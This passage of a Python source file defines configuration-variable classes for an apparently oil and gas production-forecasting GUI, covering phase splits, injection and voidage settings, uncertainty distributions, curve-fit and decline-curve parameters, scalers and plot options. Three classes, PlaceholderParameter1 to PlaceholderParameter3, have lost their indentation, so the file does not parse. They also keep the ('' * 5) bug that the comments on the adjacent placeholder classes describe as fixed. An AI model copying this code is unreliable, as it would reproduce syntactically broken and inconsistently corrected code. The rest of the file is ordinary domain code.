        self._choices = ('', 'Fixed', 'Multiphasic spill-over', 'Monophasic spill-over', 'Production to injection')
        self._choice_images = (None, ico.oil_cum_16x16, ico.fluids_16x16, ico.liquid_cum_16x16, ico.fluids_injection_16x16)
        self._tooltip = 'Defines the split-type used in determining\n' \
                        'how the phases are split.\n' \
                        '- Fixed: Sends phases to the two nodes based on the fractions given below.\n' \
                        '- Multiphasic:...'
        self._pytype = tuple
class OilSplit(Variable):
    """Oil split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Oil split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Oil split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class GasSplit(Variable):
    """Gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class WaterSplit(Variable):
    """Water split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Water split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Water split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class LiftGasSplit(Variable):
    """Lift-gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Lift-gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Lift-gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class InjectionGasSplit(Variable):
    """Injection gas split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Injection gas split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Injection gas split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
class InjectionWaterSplit(Variable):
    """Injection water split fraction in [0, 1]: fraction to step-parent, remainder to parent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Injection water split'
        self._limits = (0., 1.)
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Injection water split. Fraction goes to step-parent,\n' \
                        '1-fraction goes to parent.'
# ======================================================================================================================
# Surface Variables
# ======================================================================================================================
class FacilityVariable(Variable):
    """Base class for surface-facility variables: non-negative, type 'facilities'."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'facilities'
class TargetGasLiquidRatio(FacilityVariable):
    """Target total gas-liquid ratio (TGLR) used to compute lift-gas requirements."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._frame_label = 'Target TGLR'
        self._menu_label = 'Target gas-liquid ratio'
        self._image = ico.total_gas_liquid_ratio_16x16
        self._plot_label = r'Target Gas-Liquid Rate'
        self._legend = r'Target TGLR.'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Target total gas-liquid-ration used for\n' \
                        'calculating lift-gas requirements.'
        self._id = 'tglr'
class Availability(FacilityVariable):
    """Availability fraction applied to production rates and constraints."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._frame_label = 'Availability'
        self._menu_label = 'Availability'
        self._image = ico.average_uptime_16x16
        self._plot_label = r'Availability'
        self._legend = r'Availability'
        self._round_off = 3
        self._pytype = float
        self._tooltip = 'Availability applied to production rates and constraints.\n' \
                        'Individual entity availability not used in simulation, but\n' \
                        'kept for export to Phaser. Availability listed in History and Prediction is used\n' \
                        'as an over-all system availability.'
        self._id = 'availability'
class WAGCycleDuration(FacilityVariable):
    """Duration (days) between each WAG change-over from gas to water injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit('days')
        self._frame_label = 'Cycle dur.'
        self._menu_label = 'WAG cycle duration'
        self._image = ico.wag_cycle_duration_16x16
        self._plot_label = r'WAG Cycle Duration'
        self._legend = r'WAG Cycle'
        self._pytype = int
        self._tooltip = 'Duration between each change-over from\n' \
                        'gas to water injection'
        self._id = 'wag_cycle'
class WAGCycles(FacilityVariable):
    """Maximum number of WAG change-overs (starting with gas, ending with water)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._frame_label = '# of cycles'
        self._menu_label = 'WAG cycles'
        self._image = ico.wag_cycles_16x16
        self._plot_label = r'Number of WAG Cycles'
        self._legend = r'WAG Cycles'
        self._pytype = int
        self._tooltip = 'Maximum number of change-overs from\n' \
                        'gas to water injection. Starting with\n' \
                        'gas and ending with water'
        self._id = 'wag_cycles'
class TargetVoidageRatio(FacilityVariable):
    """Target voidage replacement ratio; per-producer proportions assigned via spreadsheet."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = ReservoirVolumeRatio(unit_system)
        self._frame_label = 'Target ratio'
        self._menu_label = 'Target voidage ratio'
        self._image = ico.wag_voidage_replacement_16x16
        self._plot_label = r'Target Voidage Replacement Ratio'
        self._legend = r'Target Voidage Ratio'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Target voidage replacement ratio:\n' \
                        '- Spreadsheet: Assign proportion of injection\n' \
                        '  going to each supported producer'
        self._id = 'voidage'
class VoidageProportion(FacilityVariable):
    """Voidage proportion shown on the VoidagePanel only; TargetVoidageRatio covers menu/plot."""
    # used exclusively on the VoidagePanel in PropertyPanels. TargetVoidageRatio handles menu and plotting
    def __init__(self, unit_system):
        super().__init__()
        self._unit = ReservoirVolumeRatio(unit_system)
        self._frame_label = 'Target ratio'
        self._image = ico.spreadsheet_16x16
        self._round_off = 2
        self._pytype = float
class GasInjectionPotentialConstant(FacilityVariable):
    """Optional constant gas-injection potential; when unset, potential is derived from voidage replacement."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas inj.'
        self._menu_label = 'Constant gas inj.'
        self._image = ico.gas_injection_rate_16x16
        self._limits = (0., None)
        self._plot_label = r'Constant gas injection'
        self._legend = r'Con. gas inj.'
        self._tooltip = 'Set to provide a constant gas injection potential\n' \
                        'for the well. If this is not set, the required\n' \
                        'potential will be calculated based on voidage replacement.'
        self._pytype = float
        # Bug fix: was misspelled '_round_of', which silently created an
        # unused attribute instead of setting the round-off used everywhere
        # else in this module.
        self._round_off = 1
        self._id = 'constant_gas_inj'
class WaterInjectionPotentialConstant(FacilityVariable):
    """Optional constant water-injection potential; when unset, potential is derived from voidage replacement."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water inj.'
        self._menu_label = 'Constant water inj.'
        self._image = ico.water_injection_rate_16x16
        self._limits = (0., None)
        self._plot_label = r'Constant water injection'
        self._legend = r'Con. water inj.'
        self._tooltip = 'Set to provide a constant water injection potential\n' \
                        'for the well. If this is not set, the required\n' \
                        'potential will be calculated based on voidage replacement.'
        self._pytype = float
        # Bug fix: was misspelled '_round_of', which silently created an
        # unused attribute instead of setting the round-off used everywhere
        # else in this module.
        self._round_off = 1
        self._id = 'constant_water_inj'
# ======================================================================================================================
# Auxiliary Variables
# ======================================================================================================================
class Name(Variable):
    """Entity name as a free-text string."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Name'
        self._pytype = str
        self._id = 'name'
class ScalerEvaluation(Variable):
    """Mathematical expression (string) transforming static parameters into scaling parameters."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Evaluation'
        self._image = ico.right_arrow_16x16
        self._pytype = str
        self._tooltip = 'Mathematical expression used to transform\n' \
                        'static parameters into scaling parameters.'
class SummaryEvaluation(Variable):
    """Mathematical expression (string) computing a multiplier for the production profile."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Multiplier'
        self._image = ico.right_arrow_16x16
        self._pytype = str
        self._tooltip = 'Mathematical expression used to calculate\n' \
                        'multiplier to the production profile.'
class IncludeModel(Variable):
    """Boolean flag controlling whether a fitted model is included."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Include model'
        self._pytype = bool
class MergeType(Variable):
    """Selector for how profiles are merged ('Smooth' or 'Conditional')."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Merge type'
        self._choices = ('', 'Smooth', 'Conditional')
        self._choice_images = (None, ico.merge_16x16, ico.merge_16x16)
        self._pytype = tuple
class MergePoint(Variable):
    """Merge-point coordinate; per-choice _unit/_frame_label tuples align with MergeType's choices."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'Merge at (x-axis)', 'Merge at (y-axis)')
        self._round_off = 2
        self._pytype = float
class MergeRate(Variable):
    """Merge rate; per-choice _unit/_frame_label tuples align with MergeType's choices."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'Merge rate', None)
        self._round_off = 5
        self._pytype = float
class Multiplier(Variable):
    """Scalar multiplier applied to a profile."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Multiplier'
        self._round_off = 1
        self._pytype = float
class Addition(Variable):
    """Scalar addition applied to a profile."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Addition'
        self._round_off = 1
        self._pytype = float
class RunFrom(Variable):
    """Selector for the starting point of a run (first point, last point, or a specific value)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Run from'
        self._choices = (None, 'First point', 'Last point', 'Specific')
        self._choice_images = (None, ico.first_point_16x16, ico.last_point_16x16, ico.specific_point_16x16)
        self._pytype = tuple
class RunFromSpecific(Variable):
    """Axis selector (x or y) used when RunFrom is 'Specific'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Axis'
        self._choices = (None, 'x-axis', 'y-axis')
        self._choice_images = (None, ico.x_axis_16x16, ico.y_axis_16x16)
        self._pytype = tuple
class RunFromValue(Variable):
    """Non-negative value on the selected axis used when RunFrom is 'Specific'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Value'
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
class RunTo(Variable):
    """End point (x-axis value) of a run."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Run to (x-axis)'
        self._image = ico.run_16x16
        self._round_off = 1
        self._pytype = float
class Frequency(Variable):
    """Time-step frequency selector (Yearly / Quarterly / Monthly / Delta)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Frequency'
        self._choices = ('Yearly', 'Quarterly', 'Monthly', 'Delta')
        self._choice_images = (ico.dates_year_16x16, ico.dates_quarter_16x16, ico.dates_16x16, ico.timestep_16x16)
        self._pytype = tuple
class TimeDelta(Variable):
    """Per-step delta (days); only active for Frequency's fourth choice ('Delta')."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, TimeUnit('days'))
        self._frame_label = (None, None, None, 'Delta')
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Number of days for each time-step.'
class TimeStep(Variable):
    """Simulation time-step length in days."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit('days')
        self._frame_label = 'Time-step'
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Number of days for each time-step.'
class SaveAllSamples(Variable):
    """Boolean flag: keep every sampled run (enables shading/histograms at the cost of file size)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Save all samples'
        self._pytype = bool
        self._tooltip = 'Save all the sampled runs. This allows for\n' \
                        '- Display distribution shading in Cartesian charts\n' \
                        '- Display Histograms of summary variables\n' \
                        'Saved file size is substantially larger.'
class SimulateConstrainted(Variable):
    """Boolean flag: simulate with voidage replacement and surface-network constraints.

    NOTE(review): class name is misspelled ('Constrainted'); kept as-is since
    external callers may reference it by this name.
    """
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Simulate with constraints'
        self._pytype = bool
        self._tooltip = 'Simulate using voidage replacement\n' \
                        'assumptions and surface network constraints.\n' \
                        'Rates will be based on the choke position and\n' \
                        'potentials will become instantaneous potentials.'
class Samples(Variable):
    """Number of stochastic samples to run (non-negative integer)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._frame_label = '# of samples'
        self._plot_label = 'Samples'
        self._limits = (0., None)
        self._pytype = int
        self._tooltip = 'Number of stochastic samples to run.'
# ======================================================================================================================
# Scenario and Event Variables
# ======================================================================================================================
class StartDate(Variable):
    """Start date of a prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Start'
        self._pytype = date
        self._tooltip = 'Start date of prediction'
class EndDate(Variable):
    """End date of a prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'End'
        self._pytype = date
        self._tooltip = 'End date of prediction'
class EventTrigger(Variable):
    """Selector for what triggers an event: the scenario or a fixed date."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Trigger'
        self._choices = ('Scenario', 'Date')
        self._choice_images = (ico.scenario_16x16, ico.event_16x16)
        self._pytype = tuple
class EventDate(Variable):
    """Event date; only active for EventTrigger's 'Date' choice (per-choice tuples)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, 'Date')
        self._pytype = date
class OffsetYears(Variable):
    """Offset in years; only active for EventTrigger's 'Scenario' choice (per-choice tuples)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (TimeUnit('years'), None)
        self._frame_label = ('Offset', None)
        self._round_off = 2
        self._pytype = float
# ======================================================================================================================
# Uncertainty Variables
# ======================================================================================================================
class UncertainValue(Variable):
    """Deterministic base value from which uncertainty samples are drawn."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Value'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Deterministic value used for sampling.'
class Distribution(Variable):
    """Probability distribution selector for sampling the property's uncertainty space."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Distribution'
        # Tuple for consistency with every other _choices in this module
        # (and with _pytype = tuple below); was a list.
        self._choices = ('', 'Swanson', 'Uniform', 'Triangular', 'Normal', 'Lognormal')
        self._choice_images = (None, ico.swanson_distribution_16x16, ico.uniform_distribution_16x16,
                               ico.triangular_distribution_16x16, ico.normal_distribution_16x16,
                               ico.lognormal_distribution_16x16)
        self._pytype = tuple
        self._tooltip = 'Probability distribution used for sampling\n' \
                        'of the properties uncertainty space.'
class DistributionParameter1(Variable):
    """First distribution parameter (min/mean, as +/- % of Value); per-choice tuples align with Distribution."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', '+/-%', '+/-%', '+/-%', '+/-%')
        self._frame_label = (None, 'Min', 'Min', 'Min', 'Mean', 'Mean')
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
class DistributionParameter2(Variable):
    """Second distribution parameter (mode/max/st.dev.); per-choice tuples align with Distribution."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', '+/-%', '+/-%', '+% of mean', '+% of mean')
        self._frame_label = (None, 'Mode', 'Max', 'Mode', 'St. dev.', 'St. dev.')
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
class DistributionParameter3(Variable):
    """Third distribution parameter (max, only for 3-parameter distributions); per-choice tuples align with Distribution."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, '+/-%', None, '+/-%', None, None)
        self._frame_label = (None, 'Max', None, 'Max', None, None)
        self._limits = (-100., None)
        self._pytype = int
        self._tooltip = 'Distribution parameters is calculated\n' \
                        'as +/- percentage of Value.'
# ======================================================================================================================
# Analogue Function Variables
# ======================================================================================================================
class PlaceholderMethod(Variable):
    """Blank stand-in for a method selector before a real fit method is chosen."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        # Bug fix: '' * 5 evaluates to the single string '', not five blank
        # entries. Use a 5-tuple of empty strings so _choices is a sequence
        # of per-slot labels like the sibling *Method variables.
        self._choices = ('',) * 5
        self._choice_images = (None,)
        self._pytype = tuple
class PlaceholderInput(Variable):
    """Blank stand-in for a per-method input field (cf. HistoryInput / CurvefitInput)."""
    def __init__(self, unit_system=None):
        super().__init__()
        # Bug fix: '' * 5 evaluated to the single string '' rather than five
        # per-choice labels; _unit widened to match so per-choice indexing
        # cannot fall off the end (cf. HistoryInput's per-choice tuples).
        self._unit = (None,) * 5
        self._frame_label = ('',) * 5
        self._pytype = int
class PlaceholderParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class HistoryMethod(Variable):
    """Method selector for history-based forecasting."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('History', 'Moving average')
        self._choice_images = (ico.history_fit_16x16, ico.moving_average_fit_16x16)
        self._pytype = tuple
class HistoryInput(Variable):
    """Input slot per history method; 'n' is presumably the moving-average
    window length — confirm against the consumer."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, 'n')
        self._pytype = int
class HistoryParameter1(Variable):
    """Unused parameter slot for history methods (all labels None)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class HistoryParameter2(Variable):
    """Unused parameter slot for history methods (all labels None)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class HistoryParameter3(Variable):
    """Unused parameter slot for history methods (all labels None)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None)
        self._frame_label = (None, None)
        self._pytype = int
class CurvefitMethod(Variable):
    """Curve-fit model selector (constant/linear/exponential/power/log)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Constant', 'Linear', 'Exponential', 'Power', 'Logarithmic')
        self._choice_images = (ico.constant_fit_16x16, ico.linear_fit_16x16, ico.exponential_fit_16x16, ico.power_fit_16x16, ico.logarithmic_fit_16x16)
        self._pytype = tuple
class CurvefitInput(Variable):
    """No direct user inputs for curve-fit methods (all slots None)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, None, None, None, None)
        self._pytype = int
class CurvefitParameter1(Variable):
    """First fitted coefficient: the constant term or 'a'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = ('con.', 'a', 'a', 'a', 'a')
        self._round_off = 3
        self._pytype = float
class CurvefitParameter2(Variable):
    """Second fitted coefficient 'b' (absent for the constant model)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, 'b', 'b', 'b', 'b')
        self._round_off = 2
        self._pytype = float
class CurvefitParameter3(Variable):
    """Third fitted coefficient 'c' (exponential and power models only)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None, None, None)
        self._frame_label = (None, None, 'c', 'c', None)
        self._round_off = 2
        self._pytype = float
class NonParametricMethod(Variable):
    """Method selector for non-parametric forecasting (bow-wave only)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Bow-wave',)
        self._choice_images = (ico.bow_wave_16x16,)
        self._pytype = tuple
class NonParametricInput(Variable):
    """'Mid' input value for the bow-wave method."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = ('Mid',)
        self._round_off = 2
        self._pytype = float
class NonParametricParameter1(Variable):
    """Unused parameter slot for non-parametric methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class NonParametricParameter2(Variable):
    """Unused parameter slot for non-parametric methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class NonParametricParameter3(Variable):
    """Unused parameter slot for non-parametric methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None,)
        self._frame_label = (None,)
        self._pytype = int
class DCAMethod(Variable):
    """Decline-curve-analysis model selector."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Method'
        self._choices = ('Exponential', 'Hyperbolic', 'Harmonic')
        self._choice_images = (ico.exponential_dca_16x16, ico.hyperbolic_dca_16x16, ico.harmonic_dca_16x16)
        self._pytype = tuple
class DCAInput(Variable):
    """DCA input; 'b' exponent applies to the hyperbolic model only."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, 'b', None)
        self._round_off = 2
        self._pytype = float
class DCAParameter1(Variable):
    """Fitted initial rate 'q' for every DCA model."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = ('q', 'q', 'q')
        self._round_off = 2
        self._pytype = float
class DCAParameter2(Variable):
    """Fitted decline rate 'D' for every DCA model."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = ('D', 'D', 'D')
        self._round_off = 5
        self._pytype = float
class DCAParameter3(Variable):
    """Unused parameter slot for DCA methods."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = (None, None, None)
        self._frame_label = (None, None, None)
        self._pytype = int
# ======================================================================================================================
# Scaling Variables
# ======================================================================================================================
class ScalerVariable(Variable):
    """Base class for dimensionless scaling variables (non-negative floats)."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
        self._type = 'scalers'
class CumulativeScaler(ScalerVariable):
    """Scaler applied to cumulative production."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Cum'
        self._menu_label = 'Cumulative'
        self._image = ico.cum_scaler_16x16
        self._plot_label = r'Cumulative Scaler, $S_{cum}$'
        self._legend = r'$S_{cum}$'
        self._id = 's_cum'
class RateScaler(ScalerVariable):
    """Scaler applied to production rate."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Rate'
        self._menu_label = 'Rate'
        self._image = ico.rate_scaler_16x16
        self._plot_label = r'Rate Scaler, $S_{rate}$'
        self._legend = r'$S_{rate}$'
        self._id = 's_rate'
class FFWScaler(ScalerVariable):
    """Scaler applied to the fractional flow of water."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'FFW'
        self._menu_label = 'FFW'
        self._image = ico.ffw_scaler_16x16
        self._plot_label = r'Fractional Flow of Water Scaler, $S_{ffw}$'
        self._legend = r'$S_{ffw}$'
        self._id = 's_ffw'
class FFGScaler(ScalerVariable):
    """Scaler applied to the fractional flow of gas."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'FFG'
        self._menu_label = 'FFG'
        self._image = ico.ffg_scaler_16x16
        self._plot_label = r'Fractional Flow of Gas Scaler, $S_{ffg}$'
        self._legend = r'$S_{ffg}$'
        self._id = 's_ffg'
class OnsetScaler(ScalerVariable):
    """Time shift (in years) before fractional flow begins."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit('years')
        self._frame_label = 'Onset'
        self._menu_label = 'Onset'
        self._image = ico.time_16x16 # TODO: Draw icon
        self._plot_label = r'Fractional Flow Onset, $\Delta$'
        self._legend = r'Onset'
        self._id = 'onset'
class InitialWCTScaler(Variable):
    """Initial water-cut as a percentage (0-100); not a ScalerVariable
    subclass because its limits and type differ."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PercentageUnit()
        self._frame_label = 'Ini. WCT'
        self._menu_label = 'Initial WCT'
        self._image = ico.wct_ini_scaler_16x16
        self._limits = (0., 100.)
        self._plot_label = r'Initial Water-cut'
        self._legend = r'Ini. WCT'
        self._pytype = int
        self._type = 'scalers'
        self._id = 'wct_ini'
class ScalerSelection(Variable):
    """Drop-down selector for which scaler to display."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Scaler'
        self._choices = ('Cumulative', 'Rate', 'FFW', 'FFG')
        self._choice_images = (ico.cum_scaler_16x16, ico.rate_scaler_16x16, ico.ffw_scaler_16x16, ico.ffg_scaler_16x16)
        self._pytype = tuple
# ======================================================================================================================
# Selection of possible static parameters used as input to scaling laws
# ======================================================================================================================
class StaticVariable(Variable):
    """Base class for static per-entity inputs to scaling laws."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 1
        self._pytype = float
        self._type = 'statics'
class CompletedLength(StaticVariable):
    """Completed well length."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LengthUnit(unit_system)
        self._frame_label = 'Well length'
        self._menu_label = 'Well length'
        self._image = ico.completion_16x16
        self._plot_label = r'Well Length'
        self._legend = r'Well length'
        self._id = 'length'
class HydrocarbonFeet(StaticVariable):
    """Hydrocarbon feet (HCFT); carries an area unit."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = AreaUnit(unit_system)
        self._frame_label = 'HCFT'
        self._menu_label = 'HCFT'
        self._image = ico.HCFT_16x16
        self._plot_label = r'HCFT'
        self._legend = r'HCFT'
        self._id = 'hcft'
class HydrocarbonPoreVolume(StaticVariable):
    """Hydrocarbon pore volume (HCPV)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = VolumeUnit(unit_system)
        self._frame_label = 'HCPV'
        self._menu_label = 'HCPV'
        self._image = ico.HCPV_16x16
        self._plot_label = r'HCPV'
        self._legend = r'HCPV'
        self._id = 'hcpv'
class Permeability(StaticVariable):
    """Reservoir permeability; unit is system-independent."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PermeabilityUnit()
        self._frame_label = 'Permeability'
        self._menu_label = 'Permeability'
        self._image = ico.permeability_16x16
        self._plot_label = r'Permeability'
        self._legend = r'Permeability'
        self._id = 'permeability'
class OilDensity(StaticVariable):
    """Oil density, rho_o."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = DensityUnit(unit_system)
        self._frame_label = 'Oil density'
        self._menu_label = 'Oil density'
        self._image = ico.stoiip_16x16
        self._plot_label = r'Oil density, $\rho_o$'
        self._legend = r'$\rho_o$'
        self._id = 'oil_density'
# ======================================================================================================================
# Plot Option Variables
# ======================================================================================================================
class ShowData(Variable):
    """Toggle for overlaying historical data points on a plot."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Show data'
        self._choices = ('No', 'Yes')
        self._choice_images = (None, ico.history_match_16x16)
        self._pytype = tuple
class ShowUncertainty(Variable):
    """Toggle for showing the uncertainty band instead of the mid case."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Show uncertainty'
        self._choices = ('No', 'Yes')
        self._choice_images = (ico.mid_chart_16x16, ico.prediction_16x16)
        self._pytype = tuple
class SplitBy(Variable):
    """How to split curves into separate sub-plots."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Split by'
        self._choices = ('None', 'Entity', 'Simulation', 'Variable')
        self._choice_images = (None, ico.folder_closed_16x16, ico.project_16x16, ico.grid_properties_16x16)
        self._pytype = tuple
class GroupBy(Variable):
    """How to group curves within a sub-plot."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Group by'
        self._choices = ('None', 'Unit')
        self._choice_images = (None, None)
        self._pytype = tuple
class ColourBy(Variable):
    """How curve colours are assigned."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Colour by'
        self._choices = ('None', 'Entity type') # TODO: Not yet correct
        self._choice_images = (None, None)
        self._pytype = tuple
# ======================================================================================================================
# Variable plotting option variables (used on frames)
# ======================================================================================================================
class VariableColour(Variable):
    """Per-variable line colour picker (wx.Colour value)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Colour'
        self._tooltip = 'Select colour of line to display in cartesian charts.'
        self._pytype = wx.Colour
class VariableDrawstyle(Variable):
    """Per-variable matplotlib-style drawstyle selector."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Drawstyle'
        self._choices = ('Default', 'Steps (pre)', 'Steps (mid)', 'Steps (post)')
        self._choice_images = (None, None, None, None)
        self._pytype = tuple
class VariableLinestyle(Variable):
    """Per-variable linestyle selector."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Linestyle'
        self._choices = ('Solid', 'Dashed', 'Dash-dot', 'Dotted')
        self._choice_images = (None, None, None, None)
        self._pytype = tuple
# ======================================================================================================================
# Settings variables
# ======================================================================================================================
class SettingsUnitSystem(Variable):
    """Global unit-system preference (Field or Metric)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Unit system'
        self._choices = ('Field', 'Metric')
        self._choice_images = (None, None)
        self._pytype = tuple
# Shared option lists for the size selectors below.
LINE_SIZES = ('1', '2', '3', '4', '5', '6', '7', '8', '9', '10')
